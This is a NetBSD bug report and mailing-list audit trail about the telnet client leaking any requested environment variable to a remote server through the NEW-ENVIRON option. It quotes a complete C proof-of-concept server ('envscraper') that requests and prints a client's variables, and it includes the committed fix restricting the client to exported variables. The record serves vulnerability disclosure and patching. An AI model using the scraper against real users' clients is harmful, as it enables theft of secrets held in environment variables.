NetBSD Problem Report #60081
From www@netbsd.org Sat Mar 14 19:50:23 2026
Return-Path: <www@netbsd.org>
Received: from mail.netbsd.org (mail.netbsd.org [199.233.217.200])
(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)
key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256
client-signature RSA-PSS (2048 bits) client-digest SHA256)
(Client CN "mail.netbsd.org", Issuer "R12" (not verified))
by mollari.NetBSD.org (Postfix) with ESMTPS id 8911B1A923A
for <gnats-bugs@gnats.NetBSD.org>; Sat, 14 Mar 2026 19:50:23 +0000 (UTC)
Message-Id: <20260314195022.732D01A923D@mollari.NetBSD.org>
Date: Sat, 14 Mar 2026 19:50:22 +0000 (UTC)
From: campbell+netbsd@mumble.net
Reply-To: campbell+netbsd@mumble.net
To: gnats-bugs@NetBSD.org
Subject: telnet(1) leaks environment variables to remote host
X-Send-Pr-Version: www-1.0
X-From4GNATS: "campbell+netbsd@mumble.net via gnats" <gnats-admin@NetBSD.org>
>Number: 60081
>Category: bin
>Synopsis: telnet(1) leaks environment variables to remote host
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: bin-bug-people
>State: needs-pullups
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Sat Mar 14 19:55:00 +0000 2026
>Closed-Date:
>Last-Modified: Sun Mar 15 12:50:01 +0000 2026
>Originator: Taylor R Campbell
>Release: current, 11, 10, 9, 8, 7, 6, 5, 4, 3, ...
>Organization:
The TelnetBSD Foundaleak, Inc.
>Environment:
>Description:
>From Justin Swartz on oss-security@:
> In a recent oss-security thread [1] regarding the CVE-1999-0073 [2]
> regression in GNU inetutils telnetd, Solar Designer suggested [3]
> that the inetutils telnet client may not have been subject to an
> adequate fix for CVE-2005-0488. [4]
>
> If this were the case, then it would mean that a telnet server could
> possibly read a client's environment variables with the NEW-ENVIRON
> option and the SEND ENV_USERVAR command.
>
> So, I wrote a simple proof of concept (attached below this message
> as envscraper.c) to find out if I could convince a telnet client to
> tell me the value of an arbitrary environment variable.
>
> [...]
>
> FreeBSD 16.0-CURRENT & NetBSD 11.0-RC2 [VULNERABLE]
>
> Both clients unconditionally leak any requested environment
> variable. No export required.
https://www.openwall.com/lists/oss-security/2026/03/13/1
>How-To-Repeat:
/*
* Attempt to extract an environment variable from a telnet client.
* $ cc -o envscraper envscraper.c -Wall -Werror -Wextra -pedantic
*/
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define IP_ADDRESS htonl(0x7f000001)
#define PORT htons(23232)
#define IAC "\xff"
#define DO "\xfd"
#define SB "\xfa"
#define SE "\xf0"
#define NEW_ENVIRON "\x27"
#define SEND "\x01"
#define USERVAR "\x03"
static int server = -1, client = -1;
static void usage(FILE *stream)
{
fprintf(stream, "usage: envscraper VARIABLE\n");
}
static int setup(void)
{
int reuse = 1;
struct sockaddr_in address = { .sin_family = AF_INET };
socklen_t length = sizeof(address);
server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (server == -1) {
perror("socket");
return -1;
}
if (setsockopt(server, SOL_SOCKET,
SO_REUSEADDR, &reuse, sizeof(reuse)) == -1) {
perror("setsockopt: SO_REUSEADDR");
return -1;
}
address.sin_addr.s_addr = IP_ADDRESS;
address.sin_port = PORT;
if (bind(server, (struct sockaddr *)&address, sizeof(address)) == -1) {
perror("bind");
return -1;
}
if (listen(server, 1) == -1) {
perror("listen");
return -1;
}
client = accept(server, (struct sockaddr *)&address, &length);
if (client == -1) {
perror("accept");
return -1;
}
return 0;
}
static int serve(char *variable)
{
const char accost[] = IAC DO NEW_ENVIRON;
const char demand[] = IAC SB NEW_ENVIRON SEND USERVAR;
const char end[] = IAC SE;
int count;
size_t total = 0;
char ransom[1024];
struct timeval wait = { .tv_sec = 1 };
if (send(client, accost, sizeof(accost) - 1, 0) == -1) {
perror("send: accost");
return -1;
}
if (send(client, demand, sizeof(demand) - 1, 0) == -1) {
perror("send: demand");
return -1;
}
if (send(client, variable, strlen(variable), 0) == -1) {
perror("send: variable");
return -1;
}
if (send(client, end, sizeof(end) - 1, 0) == -1) {
perror("send: end");
return -1;
}
if (setsockopt(client, SOL_SOCKET,
SO_RCVTIMEO, (const char *)&wait, sizeof(wait)) == -1) {
perror("setsockopt: SO_RCVTIMEO");
return -1;
}
while (total < sizeof(ransom)) {
count = recv(client, ransom + total, sizeof(ransom) - total, 0);
if (count == 0)
break;
if (count == -1) {
if (errno == EWOULDBLOCK || errno == EAGAIN)
break;
perror("recv: ransom");
return -1;
}
total += count;
}
if (write(STDOUT_FILENO, ransom, total) == -1) {
perror("write: stdout");
return -1;
}
return 0;
}
static void cleanup(void)
{
if (client > -1)
close(client);
if (server > -1)
close(server);
}
int main(int argc, char *argv[])
{
if (argc != 2) {
usage(stderr);
return EXIT_FAILURE;
}
atexit(cleanup);
if (setup() == -1)
return EXIT_FAILURE;
if (serve(argv[1]) == -1)
return EXIT_FAILURE;
return EXIT_SUCCESS;
}
>Fix:
don't send env vars if they're not marked exported, like OpenBSD did back in 2005
>Release-Note:
>Audit-Trail:
From: Paul Goyette <paul@whooppee.com>
To: gnats-bugs@netbsd.org
Cc: gnats-admin@netbsd.org, netbsd-bugs@netbsd.org
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sat, 14 Mar 2026 13:25:18 -0700 (PDT)
shouldn't this be category==security ?
+---------------------+--------------------------+----------------------+
| Paul Goyette (.sig) | PGP Key fingerprint: | E-mail addresses: |
| (Retired) | 1B11 1849 721C 56C8 F63A | paul@whooppee.com |
| Software Developer | 6E2E 05FD 15CE 9F2D 5102 | pgoyette@netbsd.org |
| & Network Engineer | | pgoyette99@gmail.com |
+---------------------+--------------------------+----------------------+
From: Thomas Klausner <wiz@netbsd.org>
To: gnats-bugs@netbsd.org
Cc:
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sat, 14 Mar 2026 21:27:46 +0100
--ps2sejysptawy7ir
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
I think this was handled already, see attached commit message.
Thomas
--ps2sejysptawy7ir
Content-Type: message/rfc822
Content-Disposition: inline
Return-Path: <bounces-source-changes-full-owner-wiz=NetBSD.org@NetBSD.org>
Delivered-To: wiz@gatalith.at
Received: from gatalith.at
by gatalith.at with LMTP
id 5vogDlhotGnmSAAA4iLUCg
(envelope-from <bounces-source-changes-full-owner-wiz=NetBSD.org@NetBSD.org>)
for <wiz@gatalith.at>; Fri, 13 Mar 2026 20:41:12 +0100
Received: from mail.netbsd.org (mail.netbsd.org [199.233.217.200])
by gatalith.at (Postfix) with ESMTPS id 6DD6C3908B3
for <wiz@gatalith.at>; Fri, 13 Mar 2026 20:41:10 +0100 (CET)
Received: by mail.netbsd.org (Postfix)
id CEDDD85814; Fri, 13 Mar 2026 19:41:05 +0000 (UTC)
Delivered-To: wiz@netbsd.org
Received: by mail.netbsd.org (Postfix, from userid 605)
id 79E838580D; Fri, 13 Mar 2026 19:41:05 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=netbsd.org;
s=20240131; t=1773430865;
bh=xWquhkou7MMJCv2WBR9EapcVWKirfD19MQ2Ci3W39qQ=;
h=Date:From:Subject:To:List-Id:Reply-To:List-Unsubscribe;
b=isv/4x5I6yFQ9DMk8IdkwxNLBnvosuSp45lPnNlwbWiPRdqjkOtWucL24aOUs5osX
H2fKaA+4cSIZl8rrE5x+K6D4hdhe/+iovavnPar1eY2/VPxJgevyhzTjbK4ajY+oba
gVF+MywGk9Rn2m/bsSfw1b4dRugw4LrNcFUg1jrQ=
Delivered-To: source-changes-full@NetBSD.org
Received: from localhost (localhost [127.0.0.1])
by mail.netbsd.org (Postfix) with ESMTP id E8F5C84DAE
for <source-changes-full@NetBSD.org>; Fri, 13 Mar 2026 19:41:03 +0000 (UTC)
X-Virus-Scanned: amavisd-new at netbsd.org
Authentication-Results: mail.netbsd.org (amavisd-new);
dkim=pass (1024-bit key) header.d=netbsd.org
Received: from mail.netbsd.org ([IPv6:::1])
by localhost (mail.netbsd.org [IPv6:::1]) (amavisd-new, port 10025)
with ESMTP id BwWp7e8uNA7Z for <source-changes-full@netbsd.org>;
Fri, 13 Mar 2026 19:41:03 +0000 (UTC)
Received: from cvs.NetBSD.org (ivanova.NetBSD.org [IPv6:2001:470:a085:999:28c:faff:fe03:5984])
by mail.netbsd.org (Postfix) with ESMTP id 07CC984DE8
for <source-changes-full@NetBSD.org>; Fri, 13 Mar 2026 19:41:03 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=netbsd.org;
s=20240131; t=1773430863;
bh=xWquhkou7MMJCv2WBR9EapcVWKirfD19MQ2Ci3W39qQ=;
h=Date:From:Subject:To:Reply-To;
b=G9MUrtU8tDvkxHWHO0vY6oHWDxpbGW9M6Yloc7nftTfkfsdapwFtvarc3NuEy9+eU
Pc83fqQIgNRFKE01QWmgQ/SWUN8ulp4Xonfwj30PPRzFwyx4PMf2bbjax2UPo02vAn
T3Mpi5SdtLXNPMwA2e0F6qxEUe8CR9UBT3qNnKfA=
Received: by cvs.NetBSD.org (Postfix, from userid 500)
id E3F3EF983; Fri, 13 Mar 2026 19:41:02 +0000 (UTC)
Content-Transfer-Encoding: 7bit
Content-Type: multipart/mixed; boundary="_----------=_1773430862223230"
MIME-Version: 1.0
Date: Fri, 13 Mar 2026 15:41:02 -0400
From: "Christos Zoulas" <christos@netbsd.org>
Subject: CVS commit: src/usr.bin/telnet
To: source-changes-full@NetBSD.org
X-Mailer: log_accum
Message-Id: <20260313194102.E3F3EF983@cvs.NetBSD.org>
Sender: source-changes-full-owner@NetBSD.org
List-Id: <source-changes-full.NetBSD.org>
Precedence: bulk
Reply-To: source-changes-d@NetBSD.org
Mail-Reply-To: "Christos Zoulas" <christos@netbsd.org>
Mail-Followup-To: source-changes-d@NetBSD.org
List-Unsubscribe: <mailto:majordomo@NetBSD.org?subject=Unsubscribe%20source-changes-full&body=unsubscribe%20source-changes-full>
This is a multi-part message in MIME format.
--_----------=_1773430862223230
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset="US-ASCII"
Module Name: src
Committed By: christos
Date: Fri Mar 13 19:41:02 UTC 2026
Modified Files:
src/usr.bin/telnet: authenc.c commands.c externs.h telnet.c
Log Message:
Only send exported variables (from OpenBSD):
https://www.openwall.com/lists/oss-security/2026/03/13/1
To generate a diff of this commit:
cvs rdiff -u -r1.14 -r1.15 src/usr.bin/telnet/authenc.c
cvs rdiff -u -r1.80 -r1.81 src/usr.bin/telnet/commands.c
cvs rdiff -u -r1.44 -r1.45 src/usr.bin/telnet/externs.h \
src/usr.bin/telnet/telnet.c
Please note that diffs are not public domain; they are subject to the
copyright notices on the relevant files.
--_----------=_1773430862223230
Content-Disposition: inline
Content-Length: 4828
Content-Transfer-Encoding: binary
Content-Type: text/x-diff; charset=us-ascii
Modified files:
Index: src/usr.bin/telnet/authenc.c
diff -u src/usr.bin/telnet/authenc.c:1.14 src/usr.bin/telnet/authenc.c:1.15
--- src/usr.bin/telnet/authenc.c:1.14 Fri Dec 14 18:40:17 2018
+++ src/usr.bin/telnet/authenc.c Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: authenc.c,v 1.14 2018/12/14 23:40:17 christos Exp $ */
+/* $NetBSD: authenc.c,v 1.15 2026/03/13 19:41:02 christos Exp $ */
/*-
* Copyright (c) 1991, 1993
@@ -34,7 +34,7 @@
#if 0
static char sccsid[] = "@(#)authenc.c 8.1 (Berkeley) 6/6/93";
#else
-__RCSID("$NetBSD: authenc.c,v 1.14 2018/12/14 23:40:17 christos Exp $");
+__RCSID("$NetBSD: authenc.c,v 1.15 2026/03/13 19:41:02 christos Exp $");
#endif
#endif /* not lint */
@@ -85,7 +85,7 @@ telnet_spin(void)
char *
telnet_getenv(char *val)
{
- return env_getvalue(val);
+ return env_getvalue(val, 0);
}
char *
Index: src/usr.bin/telnet/commands.c
diff -u src/usr.bin/telnet/commands.c:1.80 src/usr.bin/telnet/commands.c:1.81
--- src/usr.bin/telnet/commands.c:1.80 Fri Jul 8 17:51:24 2022
+++ src/usr.bin/telnet/commands.c Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: commands.c,v 1.80 2022/07/08 21:51:24 mlelstv Exp $ */
+/* $NetBSD: commands.c,v 1.81 2026/03/13 19:41:02 christos Exp $ */
/*
* Copyright (C) 1997 and 1998 WIDE Project.
@@ -63,7 +63,7 @@
#if 0
static char sccsid[] = "@(#)commands.c 8.4 (Berkeley) 5/30/95";
#else
-__RCSID("$NetBSD: commands.c,v 1.80 2022/07/08 21:51:24 mlelstv Exp $");
+__RCSID("$NetBSD: commands.c,v 1.81 2026/03/13 19:41:02 christos Exp $");
#endif
#endif /* not lint */
@@ -1791,11 +1791,11 @@ env_default(int init, int welldefined)
}
char *
-env_getvalue(const char *var)
+env_getvalue(const char *var, int exported)
{
struct env_lst *ep;
- if ((ep = env_find(var)) != NULL)
+ if ((ep = env_find(var)) != NULL && (exported || ep->export))
return ep->value;
return NULL;
}
Index: src/usr.bin/telnet/externs.h
diff -u src/usr.bin/telnet/externs.h:1.44 src/usr.bin/telnet/externs.h:1.45
--- src/usr.bin/telnet/externs.h:1.44 Fri Dec 14 18:40:17 2018
+++ src/usr.bin/telnet/externs.h Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: externs.h,v 1.44 2018/12/14 23:40:17 christos Exp $ */
+/* $NetBSD: externs.h,v 1.45 2026/03/13 19:41:02 christos Exp $ */
/*
* Copyright (c) 1988, 1990, 1993
@@ -216,7 +216,7 @@ struct env_lst *env_unexport(const char
struct env_lst *env_send(const char *, char *);
struct env_lst *env_list(const char *, char *);
char *env_default(int, int );
-char *env_getvalue(const char *);
+char *env_getvalue(const char *, int);
void env_varval(const char *);
int auth_cmd(int, char *[]);
int ayt_status(void);
Index: src/usr.bin/telnet/telnet.c
diff -u src/usr.bin/telnet/telnet.c:1.44 src/usr.bin/telnet/telnet.c:1.45
--- src/usr.bin/telnet/telnet.c:1.44 Sat Oct 30 09:43:40 2021
+++ src/usr.bin/telnet/telnet.c Fri Mar 13 15:41:02 2026
@@ -1,4 +1,4 @@
-/* $NetBSD: telnet.c,v 1.44 2021/10/30 13:43:40 hannken Exp $ */
+/* $NetBSD: telnet.c,v 1.45 2026/03/13 19:41:02 christos Exp $ */
/*
* Copyright (c) 1988, 1990, 1993
@@ -34,7 +34,7 @@
#if 0
static char sccsid[] = "@(#)telnet.c 8.4 (Berkeley) 5/30/95";
#else
-__RCSID("$NetBSD: telnet.c,v 1.44 2021/10/30 13:43:40 hannken Exp $");
+__RCSID("$NetBSD: telnet.c,v 1.45 2026/03/13 19:41:02 christos Exp $");
#endif
#endif /* not lint */
@@ -468,7 +468,7 @@ dooption(int option)
#endif
case TELOPT_XDISPLOC: /* X Display location */
- if (env_getvalue((const unsigned char *)"DISPLAY"))
+ if (env_getvalue("DISPLAY", 0))
new_state_ok = 1;
break;
@@ -731,7 +731,7 @@ gettermname(void)
resettermname = 0;
if (tnamep && tnamep != unknown)
free(tnamep);
- if ((tname = (char *)env_getvalue((const unsigned char *)"TERM")) &&
+ if ((tname = env_getvalue("TERM", 0)) &&
(setupterm(tname, 1, &err) == 0)) {
tnamep = mklist(termbuf, tname);
} else {
@@ -898,7 +898,7 @@ suboption(void)
unsigned char temp[50], *dp;
int len;
- if ((dp = env_getvalue((const unsigned char *)"DISPLAY")) == NULL) {
+ if ((dp = env_getvalue("DISPLAY", 0)) == NULL) {
/*
* Something happened, we no longer have a DISPLAY
* variable. So, turn off the option.
@@ -1513,7 +1513,7 @@ env_opt_add(unsigned char *ep)
env_opt_add(ep);
return;
}
- vp = env_getvalue(ep);
+ vp = env_getvalue(ep, 1);
elen = 2 * (vp ? strlen((char *)vp) : 0) +
2 * strlen((char *)ep) + 6;
if ((unsigned int)(opt_replyend - opt_replyp) < elen)
@@ -2074,7 +2074,7 @@ telnet(const char *user)
send_will(TELOPT_LINEMODE, 1);
send_will(TELOPT_NEW_ENVIRON, 1);
send_do(TELOPT_STATUS, 1);
- if (env_getvalue((const unsigned char *)"DISPLAY"))
+ if (env_getvalue("DISPLAY", 0))
send_will(TELOPT_XDISPLOC, 1);
if (eight)
tel_enter_binary(eight);
--_----------=_1773430862223230--
--ps2sejysptawy7ir--
From: Christos Zoulas <christos@zoulas.com>
To: Paul Goyette <paul@whooppee.com>
Cc: gnats-bugs@netbsd.org,
gnats-admin@netbsd.org,
netbsd-bugs@netbsd.org
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sat, 14 Mar 2026 18:38:42 -0400
--Apple-Mail=_40B3BBA5-51C7-47E1-A0CB-723A6F9BF0D8
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
charset=utf-8
I've already committed the changes.
christos
> On Mar 14, 2026, at 4:25=E2=80=AFPM, Paul Goyette <paul@whooppee.com> =
wrote:
>=20
> shouldn't this be category=3D=3Dsecurity ?
>=20
>=20
> =
+---------------------+--------------------------+----------------------+
> | Paul Goyette (.sig) | PGP Key fingerprint: | E-mail addresses: =
|
> | (Retired) | 1B11 1849 721C 56C8 F63A | paul@whooppee.com =
|
> | Software Developer | 6E2E 05FD 15CE 9F2D 5102 | pgoyette@netbsd.org =
|
> | & Network Engineer | | =
pgoyette99@gmail.com |
> =
+---------------------+--------------------------+----------------------+
--Apple-Mail=_40B3BBA5-51C7-47E1-A0CB-723A6F9BF0D8
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename=signature.asc
Content-Type: application/pgp-signature;
name=signature.asc
Content-Description: Message signed with OpenPGP
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iF0EARECAB0WIQS+BJlbqPkO0MDBdsRxESqxbLM7OgUCabXjcgAKCRBxESqxbLM7
OjTKAKCbldKpqenrfyxmx3vE0Ce0TCFyFgCgup8kpK/m8tFW5RlpxOVw4X2OxmI=
=l/tv
-----END PGP SIGNATURE-----
--Apple-Mail=_40B3BBA5-51C7-47E1-A0CB-723A6F9BF0D8--
State-Changed-From-To: open->needs-pullups
State-Changed-By: riastradh@NetBSD.org
State-Changed-When: Sat, 14 Mar 2026 23:36:01 +0000
State-Changed-Why:
needs pullup-11, pullup-10, pullup-9
From: "David H. Gutteridge" <david@gutteridge.ca>
To: Gnats Bugs <gnats-bugs@netbsd.org>
Cc:
Subject: Re: bin/60081: telnet(1) leaks environment variables to remote host
Date: Sun, 15 Mar 2026 08:48:46 -0400
christos@ committed a fix for this here:
https://mail-index.netbsd.org/source-changes/2026/03/13/msg160975.html
Though no pullup tickets exist, presently.
>Unformatted:
(Contact us)
$NetBSD: query-full-pr,v 1.47 2022/09/11 19:34:41 kim Exp $
$NetBSD: gnats_config.sh,v 1.9 2014/08/02 14:16:04 spz Exp $
Copyright © 1994-2026
The NetBSD Foundation, Inc. ALL RIGHTS RESERVED.
Home